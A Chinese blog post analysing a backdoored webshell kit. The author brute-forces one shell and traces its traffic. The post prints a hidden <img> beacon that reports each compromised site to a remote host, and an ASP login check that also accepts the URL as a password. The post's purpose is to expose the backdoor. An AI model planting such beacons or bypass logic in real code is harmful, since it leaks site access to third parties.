当前位置: 移动技术网 > 网络运营>安全>加解密 > webshell后门分析第一篇

webshell后门分析第一篇

2018年01月13日  | 移动技术网网络运营  | 我要评论
  今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子      这种webshell箱子 引起了我莫大

  今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子

     这种webshell箱子 引起了我莫大的兴趣。

如图:

  

 

       立马想了一个方案。。随便找了几个webshell 进行爆破 。

        几分钟后得到一个webshell

       注:webshell 没有的 这里没得写解密过程了。

       下了个小型服务器 打开进程里面 进行监控 输入正确密码 查找一切GET /POST之类的相关连接

       果断有发现 如图所示:

           

 

       留意host 这里估计就是收信的地址 whois 果断得到 箱子作者的QQ邮箱加QQ号 其实我真不想社 俺晚上还有初中聚会岂能表现出闲得蛋疼的样子,果断不扯淡做箱子的人。

       这里感到很奇怪 以往的的webshell箱子 都是获取网址+密码 然后发送到远程服务器。 但是这个webshell很另类。难道我孤陋寡闻。还是 落后了 我的思想。

      看到


<img src='http://www.moonhack.org/web/pr/?"&u&"'></img>

 

 

看到这个标签 我表示作者真的很有水平,<img>我表示成功登陆 肯定会执行一次 ,所以在远程服务器做一个记录就行了。多隐蔽但是岂能 逃出哥的法眼。

         回想起 我们之前箱子所说 后缀 参数 这里不知道我说什么,请回去看我们第一张高清有码图。根据这个这些 我仔细了这份没有加密的网马 ?果断有所发现:

       如图所示:

              

              跟踪 URL变量 三十二个有木有

       如图所示:

              

       好吧 我仔细看 看到这块代码 感觉不对

 

if session("KKK")<>UserPass then

 

if request.form("pass")<>"" or request("pass")<>"" then

 

if request.form("pass")=UserPass or request.form("pass")=url then

 

session("KKK")=UserPass

 

response.redirect url

 

else

 


最后一个if 有逻辑问题 传入来的变量 等于UserPass或者 等于url 只有满足其中一个就可以登录了。

 

         最后结果如图:

                    

                 ---------------淫荡分割-------

                   

                     分析完毕后 又发来一只网马  好吧 等我聚会回来继续帮你分析


如您对本文有疑问或者有任何想说的,请 点击进行留言回复,万千网友为您解惑!

相关文章:

验证码:
移动技术网